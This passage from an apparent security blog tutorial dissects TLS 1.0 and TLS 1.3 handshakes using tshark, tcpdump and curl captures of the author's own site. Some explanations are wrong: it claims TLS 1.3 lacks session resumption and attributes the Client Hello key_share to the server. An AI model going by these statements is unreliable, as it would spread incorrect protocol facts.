Certificate.</p><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">Transport Layer Security</span>
<span style="color: white;"> TLSv1 Record Layer: Handshake Protocol: Certificate</span>
<span style="color: white;"> Content Type: Handshake (22)</span>
<span style="color: white;"> Version: TLS 1.0 (0x0301)</span>
<span style="color: white;"> Length: 4212</span>
<span style="color: white;"> Handshake Protocol: Certificate</span>
<span style="color: white;"> Handshake Type: Certificate (11)</span>
<span style="color: white;"> Length: 4208</span>
<span style="color: white;"> Certificates Length: 4205</span>
<span style="color: white;"> Certificates (4205 bytes)</span>
<span style="color: white;"> Certificate Length: 1390</span>
<span><span style="color: white;"> Certificate: 3082056a30820452a003020102021061e289d6689c9871120ac9bfb26a5e67300d06092a… (id-at-commonName=</span><b><span style="color: #fcff01;">www.securitynik.com</span></b><span style="color: white;">)</span></span>
<span style="color: white;"> signedCertificate</span>
<span style="color: white;"> version: v3 (2)</span>
<span style="color: white;"> serialNumber: 0x61e289d6689c9871120ac9bfb26a5e67</span>
<span style="color: white;"> signature (sha256WithRSAEncryption)</span>
<span style="color: white;"> ....</span>
<span style="color: white;"> Certificate Length: 1424</span>
<span><span style="color: white;"> Certificate: 3082058c30820374a003020102020d02008eb2023336658b64cddb9b300d06092a864886… (id-at-commonName=</span><b><span style="color: #fcff01;">GTS CA 1D4</span></b><span style="color: white;">,id-at-organizationName=Google Trust Services LLC,id-at-countryName=US)</span></span>
<span style="color: white;"> signedCertificate</span>
<span style="color: white;"> version: v3 (2)</span>
<span style="color: white;"> serialNumber: 0x02008eb2023336658b64cddb9b</span>
<span style="color: white;"> signature (sha256WithRSAEncryption)</span>
<span style="color: white;"> ....</span>
<span style="color: white;"> Certificate Length: 1382</span>
<span><span style="color: white;"> Certificate: 308205623082044aa003020102021077bd0d6cdb36f91aea210fc4f058d30d300d06092a… (id-at-commonName=</span><b><span style="color: #fcff01;">GTS Root R1</span></b><span style="color: white;">,id-at-organizationName=Google Trust Services LLC,id-at-countryName=US)</span></span>
<span style="color: white;"> signedCertificate</span>
<span style="color: white;"> version: v3 (2)</span>
<span style="color: white;"> serialNumber: 0x77bd0d6cdb36f91aea210fc4f058d30d</span>
<span style="color: white;"> signature (sha256WithRSAEncryption)</span>
<span style="color: white;"> ....</span>
</pre></div>
</div><div><br /></div><div><br /></div><div><div>Above shows a sequence (chain) of 3 certificates. The sender's www.securitynik.com certificate comes first. Hence, from to top bottom, the certificate for the domain www.securitynik.com followed by the intermediate CA (GTS CA 1D4) and the root CA (GTS Root R1). Each following certificate certifies the one preceeding it.</div><div><br /></div><div>The server must send its certificate, providing the agreed upon key exchange method is not anonymous. The server certificate should always be sent.</div><div><br /></div><div>The certificate provided is generally an X.509v3 certificate. Note, the client may also send a certificate upon request from the server. In this scenario, this is not being done.</div><div><br /></div><div>Looking at the Server Key Exchange.</div></div><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">Transport Layer Security</span>
<span style="color: white;"> TLSv1 Record Layer: Handshake Protocol: Server Key Exchange</span>
<span style="color: white;"> Content Type: Handshake (22)</span>
<span style="color: white;"> Version: TLS 1.0 (0x0301)</span>
<span style="color: white;"> Length: 298</span>
<span style="color: white;"> Handshake Protocol: Server Key Exchange</span>
<span style="color: white;"> Handshake Type: Server Key Exchange (12)</span>
<span style="color: white;"> Length: 294</span>
<span style="color: white;"> 1: EC Diffie-Hellman Server Params</span>
<span style="color: white;"> Curve Type: named_curve (0x03)</span>
<span style="color: white;"> Named Curve: x25519 (0x001d)</span>
<span style="color: white;"> Pubkey Length: 32</span>
<span style="color: white;"> Pubkey: 0aa2761ebf46891226b8005989b2ff16031eb992071eeb39fabc67c84804fc1d</span>
<span style="color: white;"> Signature Length: 256</span>
<span style="color: white;"> Signature: 7a962b3224cbd01508d562d92f8c328c5b2c813b6d2361934d6742fb2eba6e4dc6db02e6…</span><span style="font-family: Times New Roman;"><span style="white-space: normal;">
</span></span></pre></div>
<p></p><p>The Server Key Exchange message is sent directly after the server sends its certificate message and is used by the client to communicate the premaster secret. It is sent by the server only when the server certificate does not contain enough data to allow the client to exchange a premaster secret. So while our server certificate above uses RSA for authentication, we can see the Server Key Exchange message is instead using "EC Diffie-Hellman Server Params". One of the reasons for using the Server Key Exchange message is if the RSA_EXPORT public key is longer than 512 bits. I know the server certificate is using RSA but I did not notice anything specific for RSA_EXPORT. Anyhow, the public key for this cert is 2048 bits. Hence longer than 512 bits. </p><p>The client may use an RSA public key to encrypt the premaster secret or a Diffile-Hellman Public Key to complete the key exchange ("with the result being the premaster secret")</p><p>Closing out, we see the Server Hello process completed, with the "Server Hello Done" message. This message is sent to state that the server is done sending messages to support the key exchange. The client can now proceed with its phase of the key exchange process. The server now waits for the client's response.</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;"> TLSv1 Record Layer: Handshake Protocol: Server Hello Done</span>
<span style="color: white;"> Content Type: Handshake (22)</span>
<span style="color: white;"> Version: TLS 1.0 (0x0301)</span>
<span style="color: white;"> Length: 4</span>
<span style="color: white;"> Handshake Protocol: Server Hello Done</span>
<span style="color: white;"> 1: Handshake Type: Server Hello Done (14)</span>
<span style="color: white;"> Length: 0</span><span style="font-family: Times New Roman;"><span style="white-space: normal;">
</span></span></pre></div>
<p></p><p>Looking at the Client Key Exchange message</p><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~]</span>
<span style="color: white;">└─$ tshark -n -r securitynik_tls1.0.pcap -Y "tls.handshake.type == 16" -V | sed '1,81d'</span>
<span style="color: white;">Transport Layer Security</span>
<span style="color: white;"> TLSv1 Record Layer: Handshake Protocol: Client Key Exchange</span>
<span style="color: white;"> Content Type: Handshake (22)</span>
<span style="color: white;"> Version: TLS 1.0 (0x0301)</span>
<span style="color: white;"> Length: 37</span>
<span style="color: white;"> Handshake Protocol: Client Key Exchange</span>
<span style="color: white;"> Handshake Type: Client Key Exchange (16)</span>
<span style="color: white;"> Length: 33</span>
<span style="color: white;"> EC Diffie-Hellman Client Params</span>
<span style="color: white;"> Pubkey Length: 32</span>
<span style="color: white;"> Pubkey: ccdcc7ebb6ce8463f664c562cffd616daeaf23690777570e3a333168473b082d</span>
</pre></div>
</div><div><br /></div><div><div>The Client key exchange message is always sent by the client. If RSA is used, the client generates a 48 bytes premaster secret. This premaster secret will be encrypted with the certificate RSA public key and transmitted to the server. This premaster secret is used to generate the master secret.</div><div><br /></div><div>In this example, we see Diffie-Helman is being used for the Client Key Exchange. Do remember, the server sent its Diffile-Hellman parameters during its key exchange. The Diffie-Hellman parameters will allow each side to agree on the same premaster secret.</div><div><br /></div><div>The size of the master secret will always be 48 bytes in length. The length of the premaster secret varies based on the key exchange algorithm.</div><div><br /></div><div>When RSA is used for authentication and key exchange, the premaster secret is 48 bytes. For Diffie-Hellman the negotiated key size is used as the premaster secret. This is then converted into the master secret.</div><div><br /></div><div>The client also sends it <i>Change Cipher Spec </i>message</div></div><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;"> TLSv1 Record Layer: Change Cipher Spec Protocol: Change Cipher Spec</span>
<span style="color: white;"> Content Type: Change Cipher Spec (20)</span>
<span style="color: white;"> Version: TLS 1.0 (0x0301)</span>
<span style="color: white;"> Length: 1</span>
<span style="color: white;"> Change Cipher Spec Message</span><span style="font-family: Times New Roman;"><span style="white-space: normal;">
</span></span></pre></div>
<p></p><p>After the Change Cipher Spec, a finished message is sent. This verifies that the key exchange and authentication process were successful. This is the first protected message which uses the negotiated algorithms, keys and secrets. Once a peer has sent its <i>Finished</i> message and received and validated the <i>Finished </i>message from its peer, it may then begin to send and receive data over this connection. </p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;"> TLSv1 Record Layer: Handshake Protocol: Encrypted Handshake Message</span>
<span style="color: white;"> Content Type: Handshake (22)</span>
<span style="color: white;"> Version: TLS 1.0 (0x0301)</span>
<span style="color: white;"> Length: 48</span>
<span style="color: white;"> Handshake Protocol: Encrypted Handshake Message</span><span style="font-family: Times New Roman;"><span style="white-space: normal;">
</span></span></pre></div>
<p></p><p>Wrapping this up by looking at the server's Change Cipher Spec and Finished messages.</p><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~]</span>
<span style="color: white;">└─$ tshark -n -r securitynik_tls1.0.pcap -Y "(tls.record.content_type == 20) && (tcp.srcport == 443)" -V | sed '1,81d' </span>
<span style="color: white;">Transport Layer Security </span>
<span style="color: white;"> TLSv1 Record Layer: Change Cipher Spec Protocol: Change Cipher Spec </span>
<span style="color: white;"> Content Type: Change Cipher Spec (20) </span>
<span style="color: white;"> Version: TLS 1.0 (0x0301) </span>
<span style="color: white;"> Length: 1 </span>
<span style="color: white;"> Change Cipher Spec Message </span>
<span style="color: white;"> TLSv1 Record Layer: Handshake Protocol: Encrypted Handshake Message </span>
<span style="color: white;"> Content Type: Handshake (22) </span>
<span style="color: white;"> Version: TLS 1.0 (0x0301) </span>
<span style="color: white;"> Length: 48 </span>
<span style="color: white;"> Handshake Protocol: Encrypted Handshake Message </span>
</pre></div>
</div><div><br /></div><p>Finally, we see the application data is encrypted. Note, while the data is encrypted, we are still able to see that the protocol being encrypted is HTTP2.</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~]</span>
<span style="color: white;">└─$ tshark -n -r securitynik_tls1.0.pcap -Y "((tls.record.content_type == 23) && (tls.record.length == 64)) && (tcp.srcport == 443)" -V | sed '1,81d' </span>
<span style="color: white;">Transport Layer Security</span>
<span style="color: white;"> TLSv1 Record Layer: Application Data Protocol: HyperText Transfer Protocol 2</span>
<span style="color: white;"> Content Type: Application Data (23)</span>
<span style="color: white;"> Version: TLS 1.0 (0x0301)</span>
<span style="color: white;"> Length: 64</span>
<span style="color: white;"> Encrypted Application Data: b35dacf71de0fa03a23a0bdea81200463de633f3efe3985b99ba80c38e0d901addba430a…</span>
<span style="color: white;"> [Application Data Protocol: HyperText Transfer Protocol 2]</span><span style="font-family: Times New Roman;"><span style="white-space: normal;">
</span></span></pre></div>
<p></p><p>Here is that full sequence of packets.</p><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~]</span>
<span style="color: white;">└─$ tshark -n -r securitynik_tls1.0.pcap -c 15</span>
<span style="color: white;"> 1 0.000000 10.0.1.128 → 142.251.32.83 TCP 74 41570 → 443 [SYN] Seq=0 Win=64240 Len=0 MSS=1460 SACK_PERM TSval=971727410 TSecr=0 WS=128</span>
<span style="color: white;"> 2 0.014645 142.251.32.83 → 10.0.1.128 TCP 60 443 → 41570 [SYN, ACK] Seq=0 Ack=1 Win=64240 Len=0 MSS=1460</span>
<span style="color: white;"> 3 0.014733 10.0.1.128 → 142.251.32.83 TCP 54 41570 → 443 [ACK] Seq=1 Ack=1 Win=64240 Len=0</span>
<span style="color: white;"> 4 0.019859 10.0.1.128 → 142.251.32.83 TLSv1 236 Client Hello</span>
<span style="color: white;"> 5 0.020277 142.251.32.83 → 10.0.1.128 TCP 60 443 → 41570 [ACK] Seq=1 Ack=183 Win=64240 Len=0</span>
<span style="color: white;"> 6 0.069372 142.251.32.83 → 10.0.1.128 TLSv1 1466 Server Hello</span>
<span style="color: white;"> 7 0.069395 10.0.1.128 → 142.251.32.83 TCP 54 41570 → 443 [ACK] Seq=183 Ack=1413 Win=63540 Len=0</span>
<span style="color: white;"> 8 0.069978 142.251.32.83 → 10.0.1.128 TCP 2878 443 → 41570 [PSH, ACK] Seq=1413 Ack=183 Win=64240 Len=2824 [TCP segment of a reassembled PDU]</span>
<span style="color: white;"> 9 0.069993 10.0.1.128 → 142.251.32.83 TCP 54 41570 → 443 [ACK] Seq=183 Ack=4237 Win=61320 Len=0</span>
<span style="color: white;"> 10 0.070291 142.251.32.83 → 10.0.1.128 TLSv1 452 Certificate, Server Key Exchange, Server Hello Done</span>
<span style="color: white;"> 11 0.070300 10.0.1.128 → 142.251.32.83 TCP 54 41570 → 443 [ACK] Seq=183 Ack=4635 Win=61320 Len=0</span>
<span style="color: white;"> 12 0.082053 10.0.1.128 → 142.251.32.83 TLSv1 155 Client Key Exchange, Change Cipher Spec, Encrypted Handshake Message</span>
<span style="color: white;"> 13 0.082396 142.251.32.83 → 10.0.1.128 TCP 60 443 → 41570 [ACK] Seq=4635 Ack=284 Win=64240 Len=0</span>
<span style="color: white;"> 14 0.122781 142.251.32.83 → 10.0.1.128 TLSv1 113 Change Cipher Spec, Encrypted Handshake Message</span>
<span style="color: white;"> 15 0.122974 142.251.32.83 → 10.0.1.128 TLSv1 123 Application Data</span>
</pre></div>
</div><div><br /></div><div>What that understanding in place, time to move to TLSv1.3</div><div><br /><div><b><span style="font-size: medium;"><br />TLS 1.3</span></b> </div><div>Released via RFC 8446.</div><div><br /></div><div>TLS 1.3 represents a major revision of the TLS protocol. While TLS 1.3 has significant changes, the basic capabilities for previous TLS version has been retained.</div><div><br /></div><div>Some key objectives of TLS 1.3 are:</div><div><span style="white-space: normal;"><span style="white-space: pre;"> </span>* Remove unused and unsafe features of older TLS version</span></div><div><span style="white-space: normal;"><span style="white-space: pre;"> </span>* Include strong security analysis in the design</span></div><div><span style="white-space: normal;"><span style="white-space: pre;"> </span>* Improve privacy by encrypting more of the protocol</span></div><div><span style="white-space: normal;"><span style="white-space: pre;"> </span>* Reduce the time needed to complete the handshake.</span></div><div><span style="white-space: normal;"><span style="white-space: pre;"> </span>* All handshake messages after the Server Hello are now encrypted. There is also the ability to encrypt extensions messages which were previously sent in the clear via the <i>EncryptedExtensions </i>message. </span></div><div><br /></div><div>TLS 1.3 also has a new set of cipher suites that are exclusive to it. These cipher suites are based on Authenticated Encryption with Associated Data (AEAD).</div><div><br /></div><div>With the exception of the messages which are needed to establish a shared secret, the TLS handshake is encrypted.</div><div><br /></div><div>Additionally, items such as renegotiation, generic data compression, Digital Signature Algorithm (DSA) certificates, static RSA key exchange and key exchange with custom Diffie-Hellman (DH) groups have been removed. TLS 1.3 also supports forward secrecy.</div><div><br /></div><div>The TLS1.3 handshake should be looked at as having 3 phases.</div><div><span style="white-space: normal;"><span style="white-space: pre;"> </span>1. Key Exchange</span></div><div><span style="white-space: normal;"><span style="white-space: pre;"> </span>Selection of cryptographic parameters and establishment of a shared key.</span></div><div><span style="white-space: normal;"><span style="white-space: pre;"> </span>2. Server Parameters</span></div><div><span style="white-space: normal;"><span style="white-space: pre;"> </span>Establish other handshake parameters such as application layer protocol support, whether the client should be authenticated, etc. This phase is encrypted.</span></div><div><span style="white-space: normal;"><span style="white-space: pre;"> </span>3. Authentication</span></div><div><span style="white-space: normal;"><span style="white-space: pre;"> </span>Authenticate the server and optionally the client, provide key confirmation and handshake integrity. This phase is also encrypted.</span></div><div><br /></div><div><br /></div><div>Capture TLSv1.3 Traffic. </div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~]</span>
<span style="color: white;">└─$ sudo tcpdump -n -w securitynik_tls1.3.pcap 'tcp port 443 and host www.securitynik.com' -v</span>
<span style="color: white;">tcpdump: listening on eth0, link-type EN10MB (Ethernet), snapshot length 262144 bytes</span>
<span style="color: white;">q^C142 packets captured</span>
<span style="color: white;">148 packets received by filter</span>
<span style="color: white;">0 packets dropped by kernel</span>
</pre></div>
</div><div><br /></div><div><div>This is the default for <i>curl</i>. Let's still force it.</div></div><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~]</span>
<span style="color: white;">└─$ curl --verbose https://www.securitynik.com --tlsv1.3 --tls-max 1.3 | more </span>
<span style="color: white;"> % Total % Received % Xferd Average Speed Time Time Time Current</span>
<span style="color: white;"> Dload Upload Total Spent Left Speed</span>
<span style="color: white;"> 0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0* Trying 142.251.32.83:443...</span>
<span style="color: white;">* Connected to www.securitynik.com (142.251.32.83) port 443 (#0)</span>
<span style="color: white;">* ALPN: offers h2,http/1.1</span>
<span style="color: white;">} [5 bytes data]</span>
<span style="color: white;">* TLSv1.3 (OUT), TLS handshake, Client hello (1):</span>
<span style="color: white;">} [512 bytes data]</span>
<span style="color: white;">* CAfile: /etc/ssl/certs/ca-certificates.crt</span>
<span style="color: white;">* CApath: /etc/ssl/certs</span>
<span style="color: white;">{ [5 bytes data]</span>
<span style="color: white;">* TLSv1.3 (IN), TLS handshake, Server hello (2):</span>
<span style="color: white;">{ [122 bytes data]</span>
<span style="color: white;">* TLSv1.3 (IN), TLS handshake, Encrypted Extensions (8):</span>
<span style="color: white;">{ [15 bytes data]</span>
<span style="color: white;">* TLSv1.3 (IN), TLS handshake, Certificate (11):</span>
<span style="color: white;">{ [4219 bytes data]</span>
<span style="color: white;">* TLSv1.3 (IN), TLS handshake, CERT verify (15):</span>
<span style="color: white;">{ [264 bytes data]</span>
<span style="color: white;">* TLSv1.3 (IN), TLS handshake, Finished (20):</span>
<span style="color: white;">{ [52 bytes data]</span>
<span style="color: white;">* TLSv1.3 (OUT), TLS change cipher, Change cipher spec (1):</span>
<span style="color: white;">} [1 bytes data]</span>
<span style="color: white;">* TLSv1.3 (OUT), TLS handshake, Finished (20):</span>
<span style="color: white;">} [52 bytes data]</span>
<span style="color: white;">* SSL connection using TLSv1.3 / TLS_AES_256_GCM_SHA384</span>
<span style="color: white;">* ALPN: server accepted h2</span>
<span style="color: white;">* Server certificate:</span>
<span style="color: white;">* subject: CN=www.securitynik.com</span>
<span style="color: white;">* start date: May 30 04:44:46 2023 GMT</span>
<span style="color: white;">* expire date: Aug 28 05:31:35 2023 GMT</span>
<span style="color: white;">* subjectAltName: host "www.securitynik.com" matched cert's "www.securitynik.com"</span>
<span style="color: white;">* issuer: C=US; O=Google Trust Services LLC; CN=GTS CA 1D4</span>
<span style="color: white;">* SSL certificate verify ok.</span>
<span style="color: white;">} [5 bytes data]</span>
<span style="color: white;">* using HTTP/2</span><span style="font-family: Times New Roman;"><span style="white-space: normal;">
</span></span></pre></div>
<p></p><p>As we dig into TLS 1.3, we will not review every field but will try to identify the difference between TLS 1.0 while learning about 1.3. We already know the 3-way handshake has to be completed, so no need for us to repeat that step.</p><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~]</span>
<span style="color: white;">└─$ tshark -n -r securitynik_tls1.3.pcap -Y "tls.handshake.type == 1" -V | sed '1,81d;221,$d' </span>
<span style="color: white;">Transport Layer Security</span>
<span style="color: white;"> TLSv1 Record Layer: Handshake Protocol: Client Hello</span>
<span style="color: white;"> Content Type: Handshake (22)</span>
<span style="color: white;"> 1: Version: TLS 1.0 (0x0301)</span>
<span style="color: white;"> Length: 512</span>
<span style="color: white;"> Handshake Protocol: Client Hello</span>
<span style="color: white;"> Handshake Type: Client Hello (1)</span>
<span style="color: white;"> Length: 508</span>
<span style="color: white;"> 2: Version: TLS 1.2 (0x0303)</span>
<span style="color: white;"> Random: 7c818caebba31899f0cfa4b428d9cb77472cc14adcc6754f112154a448ce789f</span>
<span style="color: white;"> GMT Unix Time: Mar 11, 2036 12:15:42.000000000 EDT</span>
<span style="color: white;"> 3: Random Bytes: bba31899f0cfa4b428d9cb77472cc14adcc6754f112154a448ce789f</span>
<span style="color: white;"> Session ID Length: 32</span>
<span style="color: white;"> 4: Session ID: edb77086c25eb6bd211601cbbda8a316018082c8c67f02e9738e40226e2c4f30</span>
<span style="color: white;"> Cipher Suites Length: 8</span>
<span style="color: white;"> 5: Cipher Suites (4 suites)</span>
<span style="color: white;"> Cipher Suite: TLS_AES_256_GCM_SHA384 (0x1302)</span>
<span style="color: white;"> Cipher Suite: TLS_CHACHA20_POLY1305_SHA256 (0x1303)</span>
<span style="color: white;"> Cipher Suite: TLS_AES_128_GCM_SHA256 (0x1301)</span>
<span style="color: white;"> Cipher Suite: TLS_EMPTY_RENEGOTIATION_INFO_SCSV (0x00ff)</span>
<span style="color: white;"> 6: Compression Methods Length: 1</span>
<span style="color: white;"> Compression Methods (1 method)</span>
<span style="color: white;"> Compression Method: null (0)</span>
<span style="color: white;"> 7: Extensions Length: 427</span>
<span style="color: white;"> ... </span>
<span style="color: white;"> 8: Extension: supported_groups (len=22)</span>
<span style="color: white;"> Type: supported_groups (10)</span>
<span style="color: white;"> Length: 22</span>
<span style="color: white;"> Supported Groups List Length: 20</span>
<span style="color: white;"> Supported Groups (10 groups)</span>
<span style="color: white;"> Supported Group: x25519 (0x001d)</span>
<span style="color: white;"> Supported Group: secp256r1 (0x0017)</span>
<span style="color: white;"> Supported Group: x448 (0x001e)</span>
<span style="color: white;"> ...</span>
<span style="color: white;"> 9: Extension: signature_algorithms (len=30)</span>
<span style="color: white;"> Type: signature_algorithms (13)</span>
<span style="color: white;"> Length: 30</span>
<span style="color: white;"> Signature Hash Algorithms Length: 28</span>
<span style="color: white;"> Signature Hash Algorithms (14 algorithms)</span>
<span style="color: white;"> Signature Algorithm: ecdsa_secp256r1_sha256 (0x0403)</span>
<span style="color: white;"> Signature Hash Algorithm Hash: SHA256 (4)</span>
<span style="color: white;"> Signature Hash Algorithm Signature: ECDSA (3)</span>
<span style="color: white;"> Signature Algorithm: ecdsa_secp384r1_sha384 (0x0503)</span>
<span style="color: white;"> Signature Hash Algorithm Hash: SHA384 (5)</span>
<span style="color: white;"> Signature Hash Algorithm Signature: ECDSA (3)</span>
<span style="color: white;"> Signature Algorithm: ecdsa_secp521r1_sha512 (0x0603)</span>
<span style="color: white;"> Signature Hash Algorithm Hash: SHA512 (6)</span>
<span style="color: white;"> Signature Hash Algorithm Signature: ECDSA (3)</span>
<span style="color: white;"> ...</span>
<span style="color: white;"> 10: Extension: supported_versions (len=3)</span>
<span style="color: white;"> Type: supported_versions (43)</span>
<span style="color: white;"> Length: 3</span>
<span style="color: white;"> Supported Versions length: 2</span>
<span style="color: white;"> Supported Version: TLS 1.3 (0x0304)</span>
<span style="color: white;"> Extension: psk_key_exchange_modes (len=2)</span>
<span style="color: white;"> Type: psk_key_exchange_modes (45)</span>
<span style="color: white;"> Length: 2</span>
<span style="color: white;"> PSK Key Exchange Modes Length: 1</span>
<span style="color: white;"> PSK Key Exchange Mode: PSK with (EC)DHE key establishment (psk_dhe_ke) (1)</span>
<span style="color: white;"> Extension: key_share (len=38)</span>
<span style="color: white;"> Type: key_share (51)</span>
<span style="color: white;"> Length: 38</span>
<span style="color: white;"> Key Share extension</span>
<span style="color: white;"> Client Key Share Length: 36</span>
<span style="color: white;"> Key Share Entry: Group: x25519, Key Exchange length: 32</span>
<span style="color: white;"> Group: x25519 (29)</span>
<span style="color: white;"> Key Exchange Length: 32</span>
<span style="color: white;"> Key Exchange: 7d0b7c312e2e88130463417583423ca34085069e2950c9d08bc737e96e12b757</span>
</pre></div>
</div><div><br /></div><div><div>1: Similar to TLS 1.0, we see the record layer reports a version of TLS 1.0 (0x0301). </div><div><br /></div><div>2: In the Handshake Protocol, we see version 1.2 (0x0303) for TLS 1.2. In reality, this version field is considered legacy in TLS 1.3. TLS 1.3 instead leverages the "<i>supported_versions</i>" extension for the client to indicate its preferred version. We see the "<i>supported_versions</i>" extension number 9 above. At a minimum, the ClientHello message will contain a "<i>supported_versions</i>" extension. Only if this extension exists, then the servers will attempt to negotiate TLS 1.3</div><div><br /></div><div>3: Random Bytes: One of the things this is used for is protection against replay for TLS 1.3 1-RTT data.</div><div><br /></div><div>4: Session ID: The session_id field is also considered legacy in TLSv1.3. As we saw with TLSv1.0, the ability to resume a session existed. The value we see above would be from a pre TLSv_1.3 session. TLSv1.3 does not support session resumption.</div><div><br /></div><div>5: Cipher Suites (4 suites): This is the list of symmetric cipher suites supported by the client, the length and the hash algorithms to be used. As with TLSv1.0, these are in the order of client preference.</div><div><br /></div><div>6: Compression methods are also considered legacy in TLS 1.3</div><div><br /></div><div>7: Extensions: TLS 1.3 makes extensive use of extensions. TLS 1.3 makes some extensions mandatory, since functionality has moved into these extensions, so as to preserve compatability with previous versions of TLS. If a server does not recognize an extension, the server should just ignore it.</div><div><br /></div><div>8: supported_groups: The client uses this group to indicate the named groups the client supports for key exchange. As with the cipher suites and the signature algorithms, it is ordered by most preferred to least preferred. In this list, we have x25519 as the first item.</div><div><br /></div><div>9: signature_algorithms: This identifies the signature algorithms maybe used in digital signatures. In this example, the signature_algorithms also refers to the signatures appearing in certificates as their is no "signature_algorithms_cert" extension. If the client requires the server to authenticate itself via a certifiates, then the client must send this signature_algorithms extension. If the server is authenticating via a certificate but the client has not sent this extention then then server MUST abort this handshake with a "missing_extension". </div><div><br /></div><div>9: supported_versions: As mentioned in 2, this is used by the client to indicate which version of TLS is supports and by the server to specify the version it is using.</div><div><br /></div><div>10: key_share: This identifies the endpoint cryptographic parameters. The Key exchange inforamation is determed by the group and its corresponding definition. We see here that the server has generated it's "<i>key_share"</i> based on the group x25519 which was the first group identified in 8 above. This <i>key_share</i> represents the client thinking it knows what cipher suite the server is going to choose based on the list the client provides. In this case we see one <i>key_share.</i></div><div><br /></div><div>A combination of the <i>Client Hello </i>and <i>Server Hello</i> messages are use to determine the shared keys.</div><div><br /></div><div>With that understanding of the Client Hello, taking a quick glance at the Server Hello message.</div></div><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~]</span>
<span style="color: white;">└─$ tshark -n -r securitynik_tls1.3.pcap -Y "tls.handshake.type == 2" -V | sed '1,82d' </span>
<span style="color: white;">Transport Layer Security</span>
<span style="color: white;"> TLSv1.2 Record Layer: Handshake Protocol: Server Hello</span>
<span style="color: white;"> Content Type: Handshake (22)</span>
<span style="color: white;"> Version: TLS 1.2 (0x0303)</span>
<span style="color: white;"> Length: 122</span>
<span style="color: white;"> Handshake Protocol: Server Hello</span>
<span style="color: white;"> 1: Handshake Type: Server Hello (2)</span>
<span style="color: white;"> Length: 118</span>
<span style="color: white;"> Version: TLS 1.2 (0x0303)</span>
<span style="color: white;"> Random: da42c2479a3a83e8d13b13b9fbf446953a5b301c93c16c0e47fb661212ac13f0</span>
<span style="color: white;"> Session ID Length: 32</span>
<span style="color: white;"> Session ID: edb77086c25eb6bd211601cbbda8a316018082c8c67f02e9738e40226e2c4f30</span>
<span style="color: white;"> 2: Cipher Suite: TLS_AES_256_GCM_SHA384 (0x1302)</span>
<span style="color: white;"> Compression Method: null (0)</span>
<span style="color: white;"> Extensions Length: 46</span>
<span style="color: white;"> 3: Extension: key_share (len=36)</span>
<span style="color: white;"> Type: key_share (51)</span>
<span style="color: white;"> Length: 36</span>
<span style="color: white;"> Key Share extension</span>
<span style="color: white;"> Key Share Entry: Group: x25519, Key Exchange length: 32</span>
<span style="color: white;"> Group: x25519 (29)</span>
<span style="color: white;"> Key Exchange Length: 32</span>
